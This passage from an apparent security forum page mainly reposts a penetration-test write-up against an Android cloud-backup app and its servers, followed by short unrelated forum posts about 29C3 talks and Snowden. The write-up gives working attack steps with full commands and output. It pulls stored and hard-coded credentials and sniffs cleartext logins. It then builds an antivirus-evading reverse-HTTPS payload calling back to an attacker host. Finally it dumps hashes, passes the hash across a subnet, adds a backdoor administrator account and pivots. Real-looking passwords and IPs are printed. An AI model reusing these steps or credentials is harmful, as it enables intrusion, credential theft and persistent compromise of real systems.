Java applications running on a Dalvik virtual machine (DVK)). The main functions of this application work similarly to the famous Apple's iCloud; backup picture, video, contact and sync to a personal cloud system. Let's Begin! ##################################### [0x01] - Application Reconnaissance ##################################### "Usually, a client software package is installed locally on the mobile device which acts as the front-end for the user. Packages are typically downloaded from an app store or market, or provided via the company's website. Similar to non-mobile software, these applications can contain a myriad of vulnerabilities. It is important to note that most testing on the client device usually requires a device that is rooted or jailbroken. For example, the authentic mobile OS will most likely prevent you from having access to all files and folders on the local file system. Furthermore, as software packages can often be decompiled, tampered with or reverse engineered, you may want to use a device that does not pose any restrictions on the software that you can install." --SANS Penetration Testing Blog Our first mission is Application Reconnaissance. The objective of this mission is to understand how the application work, then try to enumerate sensitive information from data stored in a local storage and to dig out even more information, application package will be decompiled into a form of source code. +++++++++++++++++++++++++++++++++ [0x01a] - Insecure Data Storage +++++++++++++++++++++++++++++++++ We've started our first mission by creating an Android Pentest platform (Install Android SDK, Android Emulator and Burpsuite proxy) and get ready to connect to our phone using Android Debug Bridge (http://developer.android.com/tools/help/adb.html) , ADB is a versatile command line tool that lets you communicate with an emulator instance or connected Android-powered device. First, we signed up and logged in to the application then used ADB to connect a phone with a debug mode and used "adb devices" command. --------------------------------------------------------------- [zeq3ul@12:03:51]-[~]> adb devices * daemon not running. starting it now * * daemon started successfully * List of devices attached 3563772CF3BC00FH device --------------------------------------------------------------- "adb shell" command was the command we've used to connect to the phone in order to explore through the internal directory. Before we can do any further exploration, we need to identify real name of the application package which usually found in "/data/app/" folder in a form of ".apk". "/data/app/com.silentm.msec-v12.apk" was found to be a package of our target application so "com.silentm.msec-v12" is the real name of the package. Finally, folder belonging to the application in "/data/data" is most likely to be the place that sensitive information of the application are stored locally. As expected, we found crucial information stored in "/data/data/com.silentm.msec-v12/shared_prefs" as below. --------------------------------------------------------------- [zeq3ul@12:05:24]-[~]> adb shell # cd /data/data/com.silentm.msec-v12/shared_prefs # cat PREFS.xml <?xml versions='1.0' encoding='utf-8' standalone='yes'?> <map> <string name="Last_added">9</string> <boolean name"configured" value="true"/> <string name="package">Trial</string> <string name="version">1.2</string> <string name="username">zeq3ul</string> <string name="password">NXBsdXM0PTEw</string> <string name="number">089383933283</string> <string name="supportedextension">{&quote;D&quote;:&quote;HTML,XLS,XLSX,XML,TXT,DOC,DOCX,PPT,PDF,ISO,ZIP,RAR,RTF&quote;,&quote;M&quote;: &quote;MP3,MP2,WMA,AMR,WAV,OGG,MMF,AC3&quote;,&quote;I&quote;:&quote;JPEG,JPG,GIF,BMP,PNG,TIFF&quote;,&quote;V&quote;:&quote;3GP,MP4,MPEG, WMA,MOV,FLV,MKV,MPEG4,AVI,DivX&quote;}</string> ... </map> --------------------------------------------------------------- We've found our username and password stored locally in PREFS.xml, but password seems to be encrypted with some kind of encyption but if we take a good look into it you will found it was only base64 encoded string, so we can easily decoded it to reveal a real password. "NXBsdXM0PTEw" > "5plus4=10" TIPS! This is a bad example of how applications store sensitive data and also the encoding with Base64 (Encode != Encrypt) is such a bad idea of storing a password too. Example for bad code shown below: --------------------------------------------------------------- public void saveCredentials(String userName,String password) { SharedPreferences PREFS; PREFS=getSharedPreferences(MYPREFS,Activity.MODE_PRIVATE); SharedPreferences.Editor editor = PREFS.edit(); String mypassword = password; String base64password = new String(Base64.encodeToString(mypassword.getBytes(),4)); editor.putString("Username", userName); editor.putString("Password", base64password); editor.commit(); } --------------------------------------------------------------- +++++++++++++++++++++++++++++++++++++++++ [0x01b] - Decompile Application Package +++++++++++++++++++++++++++++++++++++++++ Next, in order to completely understand the mechanism of the application, we need to obtain the source code of the application. For Android application, this can be done by decompiling the Android Package (".apk") of the application. Android packages (".apk" files) are actually simply ZIP files. They contain the AndroidManifest.xml, classes.dex, resources.arsc, among other components. You can rename the extension and open it with a ZIP utility such as WinZip to view its contents. We've started with "adb pull" command to extract android application from mobile phone. --------------------------------------------------------------- [zeq3ul@12:08:37]-[~]> adb pull /data/app/com.silentm.msec-v12.apk 1872 KB/s (5489772 bytes in 2.862s) --------------------------------------------------------------- The next step is to decompile ".apk" we've just got using the tools called dex2jar (http://code.google.com/p/dex2jar/). dex2jar is intended to convert ".dex" files to human readable ".class" files in java. NOTICE! "class.dex" is stored in every ".apk" as mentioned above. This can be proved by changing any ".apk" to ".zip" and extracting it then you will find out about the structure of an ".apk" --------------------------------------------------------------- [zeq3ul@12:09:11]-[~]> bash dex2jar.sh com.silentm.msec-v12.apk dex2jar version: translator-0.0.9.8 dex2jar com.silentm.msec-v12.apk -> com.silentm.msec-v12_dex2jar.jar Done. --------------------------------------------------------------- JD-GUI (http://java.decompiler.free.fr/?q=jdgui) is our tool of choice to read a decompiled source (".jar" from dex2jar). In this case is "com.silentm.msec-v12_dex2jar.jar" NOTE: JD-GUI is a standalone graphical utility that displays Java source codes of “.class” files. You can browse the reconstructed source code with the JD-GUI for instant access to methods and fields. As a result, We found that "Config.class" stored smelly information (hard-coded) the source as shown below: Config.class --------------------------------------------------------------- package com.silentm.msec; public class Config { public static final String CONTACT_URL = "http://203.60.240.180/en/Contact.aspx"; public static final String Check_Memory = "http://203.60.240.180/en/CheckMem.aspx"; public static final String BackupSMS = "http://203.60.240.180/en/backupsms.aspx"; public static final String Forgot_Password = "http://203.60.240.180/en/ForgotPassword.aspx"; public static final String FTP_URL = "203.60.240.183"; public static final String FTP_User = "msec1s"; public static final String FTP_Password = "S1lentM!@#$ec"; public static final String Profile = "http://203.60.240.180/en/Profile.aspx"; public static final int MAX_MEMORY = 500; public static final int LOG_COUNT = 30; ... } --------------------------------------------------------------- Explain!! backup URL and FTP user and password was found in the source code (W00T W00T !!). Now we know that this application use FTP protocol to transfer picture, SMS, contact information to cloud server and it's SUCK!! because it's hard-coded and FTP is not a secure protocol. ################################### [0x02] - Man in the Middle Attack ################################### "The second attack surface is the communications channel between the client and the server. Although applications use more and more secured communications for sending sensitive data, this is not always the case. In your testing infrastructure, you will want to include an HTTP manipulation proxy to intercept and alter traffic. If the application does not use the HTTP protocol for its communication, you can use a transparent TCP and UDP proxy like the Mallory tool. By using a proxy, you can intercept, analyze, and modify data that is communicated between the client and the server." --SANS Penetration Testing Blog As we found that our target application use HTTP protocol, the next step is to setup a HTTP intercepting proxy tools such as ZapProxy or Burpsuite (Burpsuite was chosen this time) in order to perform our second misson, Man in the Middle attack, agaist the application. Having a web proxy intercepting requests is a key piece of the puzzle. From this point forward, our test will use similar technique to that of regular web applications testing. We've tried to intercepted every HTTP requests and response on application with Burpsuite Proxy (http://www.portswigger.net/burp/). For HTTP request, we found sensitive information (username and password) sent to server-side because it use HTTP protocol that sent packet in clear text while performing log in shown below (anyone in the middle of this communication will see those information crystal clear, what a kind App!). Burpsuite: HTTP Request --------------------------------------------------------------- POST http://203.60.240.180/en/GetInfo.aspx HTTP/1.1 Content-Length: 56 Content-Type: application/x-www-form-urlencoded Host: 203.60.240.180 Connection: Keep-Alive User-Agent: Apache-HttpClient/UNAVAILABLE (java 1.4) imei=352489051163052&username=zeq3ul&password=5plus4=10 --------------------------------------------------------------- Moreover, on HTTP response, We found the information that surprise us; email and password for Gmail of someone (we found out latter that was an administrator email) was shown in front of our eyes!. Burpsuite: HTTP Response --------------------------------------------------------------- HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf=8 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Fri, 07 June 2013 12:15:37 GMT Content-Length: 2405 {"AppVersion":"1.2","FTP_USER":"msec1s","FTP_PASS":"S1lentM!@#$ec","FTP_SERVER":"203.60.240.183","MAX_MEMORY":"500","LOG_COUNT":"30", "Smtp":"smtp.gmail.com","FromEmail":"mseccloud@gmail.com","FromEmailPwd":"M[Sec)0/",................ --------------------------------------------------------------- As a result, We were able to sniff username and password in clear text (no SSL nor encryption) and compromise the email of an administrator using email "mseccloud@gmail.com" and password "M[Sec)0/" that they gave us for free via HTTP reponse. :\ ############################# [0x03] - Server-Side Attack ############################# "In most cases, the server to which the client communicates is one or more web servers. The attack vectors for the web servers behind a mobile application is similar to those we use for regular web sites. Aside from looking for vulnerabilities in the web application, you should also perform host and service scans on the target system(s) to identify running services, followed by a vulnerability scan to identify potential vulnerabilities, provided that such testing is allowed within the scope of the assignment." --SANS Penetration Testing Blog ++++++++++++++++++++ [0x03a] - Scanning ++++++++++++++++++++ As we've found backend URL (203.60.240.180 and 203.60.240.183) from the source code, we need to check the security of the backend system as well. We've started by scanning target for open ports by using nmap (http://nmap.org). Nmap Result for 203.60.240.180 --------------------------------------------------------------- [zeq3ul@12:30:54]-[~]> nmap -sV -PN 203.60.240.180 Starting Nmap 6.00 ( http://nmap.org ) at 2013-06-07 12:31 ICT Nmap scan report for 203.60.240.180 Host is up (0.0047s latency). Not shown: 998 filtered ports PORT STATE SERVICE VERSION 80/tcp open http Microsoft IIS httpd 7.0 443/tcp open ssl/http Microsoft IIS httpd 7.0 3389/tcp open ms-wbt-server? Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows Service detection performed. Please report any incorrect results at http://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 21.99 seconds --------------------------------------------------------------- Nmap Result for 203.60.240.183 --------------------------------------------------------------- [zeq3ul@12:35:12]-[~]> nmap -sV -PN 203.60.240.183 Starting Nmap 6.00 ( http://nmap.org ) at 2013-06-07 12:35 ICT Nmap scan report for 203.60.240.183 Host is up (0.0036s latency). Not shown: 997 filtered ports PORT STATE SERVICE VERSION 21/tcp open ftp Microsoft ftpd Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows Service detection performed. Please report any incorrect results at http://nmap.org/submit/. Nmap done: 1 IP address (1 host up) scanned in 16.38 seconds --------------------------------------------------------------- From the scan result, we got a list of opening ports and we've found that there were IIS and Terminal Service running on 203.60.240.180 and FTP running on 203.60.240.183; It's time to grab low-hanging fruits. ++++++++++++++++++++++++++ [0x03b] - Gaining Access ++++++++++++++++++++++++++ As we found FTP username and password from the source code ("msec1s","S1lentM!@#$ec"). We were able to access to FTP service running on the server as shown below: FTP Server: 203.60.240.183 --------------------------------------------------------------- [zeq3ul@12:40:12]-[~]> ftp 203.60.240.183 Connected to 203.60.140.183 220 Microsoft FTP Service User <203.60.140.183:<none>>: msec1s 331 Password required Password: 230 User logged in. ftp> pwd 257 "/" is current directory. ftp> --------------------------------------------------------------- Now that we've compromised FTP Server using account "msec1s". We were able to access all customer contact, picture, video, Etc. Excitedly, we expected to find some "INTERESTING" picture or Clip video; BUT we found DICK! WTF!! so we got shock and stop searching. OTL _____________________________________________________________ | NO DICK NO DICK NO DICK NO DICK NO DICK ^^^^^^^^\ | | NO DICK NO DICK NO DICK NO DICK NO DICK | | | | NO DICK NO DICK NO DICK NO DICK NO DICK |_ __ | | | NO DICK NO DICK NO DICK NO DICK NO DICK (.(. ) | | | NO DICK NO DICK NO DICK NO DICK NO DI _ (_ ) | | \\ /___/' / | | _\\_ \ | | | (( ) /====| | | \ <.__._- \ | |___________________________________________ <//___. || Moving to our next target, 203.60.240.180, we've tried to access target via Terminal Service. Luckily, we were able to access target server using the same username and password from FTP Server ("msec1s","S1lentM!@#$ec"). Yummy! Remote Desktop with rdesktop --------------------------------------------------------------- [zeq3ul@12:56:04]-[~]> rdesktop -u msec1s -p S1lentM!@#$ec 203.60.240.180 --------------------------------------------------------------- Moreover, "msecls" account was in an administrator privileges group. OWNAGED! +++++++++++++++++++++++++++++ [0x03c] - Bypass Anti-virus +++++++++++++++++++++++++++++ Many Anti-Virus programs work by pattern or signature matching. If any program look like malware by its appearance, the AV will catch it. If the malicious file has a signature that the AV do not know, AV are most likely to identify those file as clean and unharmed. "Veil, a new payload generator created by security expert and Blackhat USA class instructor Chris Truncer, does just that." -- https://www.christophertruncer.com/veil-a-payload-generator-to-bypass-antivirus/ Simply pick payload and use msfveom shellcode, chose reverse HTTPS to our web server (cwh.dyndns.org) by following command: --------------------------------------------------------------- ======================================================================== Veil | [Version]: 1.1.0 | [Updated]: 06.01.2013 ======================================================================== [?] Use msfvenom or supply custom shellcode? 1 - msfvenom (default) 2 - Custom [>] Please enter the number of your choice: 1 [?] What type of payload would you like? 1 - Reverse TCP 2 - Reverse HTTP 3 - Reverse HTTPS 0 - Main Menu >] Please enter the number of your choice: 3 [?] What's the Local Host IP Address: cwh.dyndns.org [?] What's the Local Port Number: 443 --------------------------------------------------------------- Now we've got payload.exe file, When any Windows system execute this .exe, they will try to connect to the our server immediately. +++++++++++++++++++++++++++ [0x03d] - PWNED System !! +++++++++++++++++++++++++++ Time to PWN! As the target server (203.60.140.180) can be access using MSRDP Service (on port 3389) + it has access to the internet, we can just open the web server on our machine and then remote (via MSRDP) to the server to download and get our payload (payload.exe) executed. Executed Metasploit payload (payload.exe) will connect a meterpreter payload back (reverse_https) to our server (cwh.dyndns.org). After that, we used hashdump to get LM/NTLM hash on server but this cannot be done yet because if you are on a x64 box and meterpreter isn't running in a x64 process, it will fail saying that it doesn't have the correct version offsets (x64 system and Meterpreter is x86/win32). So we need to find a good process to migrate into and kick it from there. In this case we migrate our process to Winlogon process which running as x64 box. Our console will have a log like this. --------------------------------------------------------------- [zeq3ul@13:16:14]-[~]> sudo msfconsole [sudo] password for zeq3ul: Call trans opt: received. 2-19-98 13:18:48 REC:Loc Trace program: running wake up, Neo... the matrix has you follow the white rabbit. knock, knock, Neo. (`. ,-, ` `. ,;' / `. ,'/ .' `. X /.' .-;--''--.._` ` ( .' / ` , ` ' Q ' , , `._ \ ,.| ' `-.;_' : . ` ; ` ` --,.._; ' ` , ) .' `._ , ' /_ ; ,''-,;' ``- ``-..__``--` http://metasploit.pro =[ metasploit v4.6.2-1 [core:4.6 api:1.0] + -- --=[ 1113 exploits - 701 auxiliary - 192 post + -- --=[ 300 payloads - 29 encoders - 8 nops msf > use exploit/multi/handler msf exploit(handler) > set PAYLOAD windows/meterpreter/reverse_https PAYLOAD => windows/meterpreter/reverse_https msf exploit(handler) > set LPORT 443 LPORT => 443 msf exploit(handler) > set LHOST cwh.dyndns.org LHOST => cwh.dyndns.org msf exploit(handler) > set ExitOnSession false ExitOnSession => false msf exploit(handler) > exploit -j [*] Exploit running as background job. [*] Started HTTPS reverse handler on https://cwh.dyndns.org:443/ msf exploit(handler) > [*] Starting the payload handler... [*] 203.60.240.180:49160 Request received for /oOTJ... [*] 203.60.240.180:49160 Staging connection for target /oOTJ received... [*] Patched user-agent at offset 640488... [*] Patched transport at offset 640148... [*] Patched URL at offset 640216... [*] Patched Expiration Timeout at offset 640748... [*] Patched Communication Timeout at offset 640752... [*] Meterpreter session 1 opened (cwh.dyndns.org:443 -> 203.60.240.180:49160) at 2013-06-07 13:25:17 +0700 sessions -l Active sessions =============== Id Type Information Connection -- ---- ----------- ---------- 1 meterpreter x86/win32 WIN-UUOFVQRLB13\msec1s @ WIN-UUOFVQRLB13 cwh.dyndns.org:443 -> 203.60.240.180:49160 (203.60.240.180) msf exploit(handler) > sessions -i 1 [*] Starting interaction with 1... meterpreter > sysinfo Computer : WIN-UUOFVQRLB13 OS : Windows 2008 R2 (Build 7600). Architecture : x64 (Current Process is WOW64) System Language : en_US Meterpreter : x86/win32 meterpreter > ps -S winlogon Filtering on process name... Process List ============ PID PPID Name Arch Session User Path --- ---- ---- ---- ------- ---- ---- 384 340 winlogon.exe x86_64 1 NT AUTHORITY\SYSTEM C:\Windows\System32\winlogon.exe meterpreter > migrate 384 [*] Migrating from 1096 to 384... [*] Migration completed successfully. meterpreter > sysinfo Computer : WIN-UUOFVQRLB13 OS : Windows 2008 R2 (Build 7600). Architecture : x64 System Language : en_US Meterpreter : x64/win64 meterpreter > run hashdump [*] Obtaining the boot key... [*] Calculating the hboot key using SYSKEY c6b1281c29c15b25cfa14495b66ea816... [*] Obtaining the user list and keys... [*] Decrypting user keys... [*] Dumping password hints... No users with password hints on this system [*] Dumping password hashes... Administrator:500:aad3b435b51404eeaad3b435b51404ee:de26cce0356891a4a020e7c4957afc72::: Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: msec1s:1000:aad3b435b51404eeaad3b435b51404ee:73778dadcbb3fbd800e5bb383d5ec1e3::: --------------------------------------------------------------- Now we got LM/NTLM hash for our target (203.60.240.180). ++++++++++++++++++++++++++ [0x03e] - It's Not Over ++++++++++++++++++++++++++ [ O ] \ \ p Let's move on the our final mission. \ \ \o/ \ \--'---_ /\ \ / ~~\_ ./---/__|=/_/------//~~~\ /___________________/O O \ (===(\_________(===(Oo o o O) \~~~\____/ \---\Oo__o-- ~~~~~~~ ~~~~~~~~~~ In common case, a next thing to do is to begin to crack the hashes we've got for later use. There are many caveats to cracking Windows hashes and it does take some time so you might as well begin this process ASAP right? However, there is often no reason to spend time/cycles cracking hashes when you can "PASS THE HASH". One of the most common way to "pass the hash" is by using the PSEXEC module (exploit/windows/smb/psexec) in Metasploit. This module executes an arbitrary payload by authenticating to Windows SMB using administrative credentials (password or hash), and creating a Windows service. This is a pretty powerful module on most pen-test tools, once you get to the point of dumping hashes on a Windows machine. "Once you use it successfully it will become very apparent that this power could be multiplied by several orders of magnitude if someone wrote a scanning-capable version that accepts an RHOSTS option rather than a single RHOST. Apparently that's what Carlos Perez thought when he wrote psexec_scanner" -- http://www.darkoperator.com/blog/2011/12/16/psexec-scanner-auxiliary-module.html --------------------------------------------------------------- meterpreter > background [*] Backgrounding session 1... msf exploit(handler) > use auxiliary/scanner/smb/psexec_scanner msf auxiliary(psexec_scanner) > show options Module options (auxiliary/scanner/smb/psexec_scanner): Name Current Setting Required Description ---- --------------- -------- ----------- HANDLER true no Start an Exploit Multi Handler to receive the connection LHOST yes Local Hosts for payload to connect. LPORT yes Local Port for payload to connect. OPTIONS no Comma separated list of additional options for payload if needed in 'opt=val,opt=val' format. PAYLOAD windows/meterpreter/reverse_tcp yes Payload to use against Windows host RHOSTS yes Range of hosts to scan. SHARE ADMIN$ yes The share to connect to, can be an admin share (ADMIN$,C$,...) or a normal read/write folder share SMBDomain WORKGROUP yes SMB Domain SMBPass no SMB Password SMBUser no SMB Username THREADS yes The number of concurrent threads TYPE manual no Type of credentials to use, manual for provided one, db for those found on the database (accepted: db, manual) msf auxiliary(psexec_scanner) > set LHOST cwh.dyndns.org LHOST => cwh.dyndns.org msf auxiliary(psexec_scanner) > set LPORT 8443 LPORT => 8443 msf auxiliary(psexec_scanner) > set RHOSTS 203.60.240.0/24 RHOSTS => 203.60.240.0/24 msf auxiliary(psexec_scanner) > set SMBUser administrator SMBUser => administrator msf auxiliary(psexec_scanner) > set SMBPass aad3b435b51404eeaad3b435b51404ee:de26cce0356891a4a020e7c4957afc72 SMBPass => aad3b435b51404eeaad3b435b51404ee:de26cce0356891a4a020e7c4957afc72 msf auxiliary(psexec_scanner) > set THREADS 10 THREADS => 10 msf auxiliary(psexec_scanner) > exploit [*] Using the username and password provided [*] Starting exploit multi handler [*] Started reverse handler on cwh.dyndns.org:8443 [*] Starting the payload handler... [*] Scanned 031 of 256 hosts (012% complete) [*] Scanned 052 of 256 hosts (020% complete) [*] Scanned 077 of 256 hosts (030% complete) [*] Scanned 111 of 256 hosts (043% complete) [*] Scanned 129 of 256 hosts (050% complete) [*] Scanned 154 of 256 hosts (060% complete) [*] 203.60.240.165:445 - TCP OPEN [*] Trying administrator:aad3b435b51404eeaad3b435b51404ee:de26cce0356891a4a020e7c4957afc72 [*] 203.60.240.180:445 - TCP OPEN [*] Trying administrator:aad3b435b51404eeaad3b435b51404ee:de26cce0356891a4a020e7c4957afc72 [*] Connecting to the server... [*] Authenticating to 203.60.240.165:445|WORKGROUP as user 'administrator'... [*] Connecting to the server... [*] Authenticating to 203.60.240.180:445|WORKGROUP as user 'administrator'... [*] Uploading payload... [*] Uploading payload... [*] Created \ExigHylG.exe... [*] Created \xMhdkXDt.exe... [*] Binding to 367abb81-9844-35f1-ad32-98f038001003:2.0@ncacn_np:203.60.240.180[\svcctl] ... [*] Binding to 367abb81-9844-35f1-ad32-98f038001003:2.0@ncacn_np:203.60.240.165[\svcctl] ... [*] Bound to 367abb81-9844-35f1-ad32-98f038001003:2.0@ncacn_np:203.60.240.180[\svcctl] ... [*] Obtaining a service manager handle... [*] Bound to 367abb81-9844-35f1-ad32-98f038001003:2.0@ncacn_np:203.60.240.165[\svcctl] ... [*] Obtaining a service manager handle... [*] Creating a new service (ZHBMTKgE - "MgHtGamQQzIQxKDJsGWvcgiAStFttWMt")... [*] Creating a new service (qJTBfPjT - "MhIpwSR")... [*] Closing service handle... [*] Closing service handle... [*] Opening service... [*] Opening service... [*] Starting the service... [*] Starting the service... [*] Removing the service... [*] Removing the service... [*] Sending stage (751104 bytes) to 203.60.240.180 [*] Closing service handle... [*] Closing service handle... [*] Deleting \xMhdkXDt.exe... [*] Deleting \ExigHylG.exe... [*] Meterpreter session 2 opened (cwh.dyndns.org:8443 -> 203.60.240.180:49161) at 2013-07-02 13:40:42 +0700 [*] Sending stage (751104 bytes) to 203.60.240.165 [*] Meterpreter session 3 opened (cwh.dyndns.org:8443 -> 203.60.240.165:50181) at 2013-07-02 13:42:06 +0700 [*] Scanned 181 of 256 hosts (070% complete) [*] Scanned 205 of 256 hosts (080% complete) [*] Scanned 232 of 256 hosts (090% complete) [*] Scanned 256 of 256 hosts (100% complete) [*] Auxiliary module execution completed msf auxiliary(psexec_scanner) > sessions -l Active sessions =============== Id Type Information Connection -- ---- ----------- ---------- 1 meterpreter x86/win32 WIN-UUOFVQRLB13\msec1s @ WIN-UUOFVQRLB13 cwh.dyndns.org:443 -> 203.60.240.180:49160 (203.60.240.180) 2 meterpreter x86/win32 NT AUTHORITY\SYSTEM @ WIN-UUOFVQRLB13 cwh.dyndns.org:8443 -> 203.60.240.180:49161 (203.60.240.180) 3 meterpreter x86/win32 NT AUTHORITY\SYSTEM @ WIN-HDO6QC2QVIV cwh.dyndns.org:8443 -> 203.60.240.165:50181 (203.60.240.165) msf auxiliary(psexec_scanner) > sessions -i 3 [*] Starting interaction with 3... meterpreter > getuid Server username: NT AUTHORITY\SYSTEM meterpreter > sysinfo Computer : WIN-HDO6QC2QVIV OS : Windows 2008 R2 (Build 7600). Architecture : x64 (Current Process is WOW64) System Language : en_US Meterpreter : x86/win32 meterpreter > shell Process 2568 created. Channel 1 created. Microsoft Windows [Version 6.1.7600] Copyright (c) 2009 Microsoft Corporation. All rights reserved. C:\Windows\system32>net user cwh 5plus4=10 /add net user cwh 5plus4=10 /add The command completed successfully. C:\Windows\system32>net localgroup administrators cwh /add net localgroup administrators cwh /add The command completed successfully. C:\Windows\system32>exit --------------------------------------------------------------- So we were able to compromise another machine (203.60.240.165). We typed "netstat -an" to view open ports on the target and found that Remote Desktop (MSRDP on port 3389) opened but we cannot directly remote to the target because the port was filtered by firewall. But there is the way to bypass this control. We used "portfwd" command from the Meterpreter shell. Portfwd is most commonly used as a pivoting technique to allow direct access to machines otherwise inaccessible from the attacking system. Running this command on the compromised host with access to both the attacker and destination network (or system), we can essentially forward TCP connections through this machine effectively making it a pivot point much like the port forwarding technique used with an ssh connection, portfwd will relay TCP connections to and from the connected machines. --------------------------------------------------------------- meterpreter > portfwd add -l 3389 -r 127.0.0.1 -p 3389 [*] Local TCP relay created: 0.0.0.0:3389 <-> 127.0.0.1:3389 --------------------------------------------------------------- Lastly, we used rdesktop to connect to machine target server (203.60.240.165) with following command. --------------------------------------------------------------- [zeq3ul@14:02:51]-[~]> rdesktop -u cwh -p 5plus4=10 localhost --------------------------------------------------------------- FULLY COMPROMISED!! GGWP! #################### [0x04] - Greetz To #################### Greetz : ZeQ3uL, JabAv0C, p3lo, Sh0ck, BAD $ectors, Snapter, Conan, Win7dos, Gdiupo, GnuKDE, JK, Retool2, diF, MaYaSeVeN Special Thx : Exploit-db.com © Offensive Security 2011 Sursa: Vulnerability analysis, Security Papers, Exploit Tutorials
  23. [h=1]29C3 29C3 GSM Cell phone network review[/h] Check out the following: Computer Repair and Security @ Dade City, Zephyrhills, and Tampa by SolidShellSecurity, LLC - IT Security Services, Data Recovery, Computer Repair, Web Hosting, and more! (quality dedicated/vps servers and IT services)
  24. [h=1]29C3 Ethics in Security Research[/h] Check out the following: Computer Repair and Security @ Dade City, Zephyrhills, and Tampa by SolidShellSecurity, LLC - IT Security Services, Data Recovery, Computer Repair, Web Hosting, and more! (quality dedicated/vps servers and IT services)
  25. [h=3]Snowden says, NSA works closely with Germany and other Western state for spying[/h] Author: Mohit Kumar, The Hacker News - Sunday, July 07, 2013 In an interview to be published in this week's of NSA whistleblower Edward Snowden said the US National Security Agency works closely with Germany and other Western states. The interview was conducted by US cryptography expert Jacob Appelbaum and documentary filmmaker Laura Poitras using encrypted emails shortly before Snowden became known globally for his whistleblowing. Snowden said an NSA department known as the Foreign Affairs Directorate coordinated work with foreign secret services. NSA provides analysis tools for data passing through Germany from regions such as the Middle East. "The partnerships are organized so that authorities in other countries can 'insulate their political leaders from the backlash' if it becomes public 'how grievously they're violating global privacy,' he said. Germans are particularly sensitive about eavesdropping because of the intrusive surveillance in the communist German Democratic Republic (GDR) and during the Nazi era. The US government has revoked the passport of Snowden, a former NSA contractor who is seeking to evade US justice for leaking details about a vast US electronic surveillance programme to collect phone and Internet data. He has been stranded at a Moscow airport for two weeks but three Latin American countries have now offered him asylum. Sursa: Snowden says, NSA works closely with Germany and other Western state for spying - The Hacker News
×
×
  • Create New...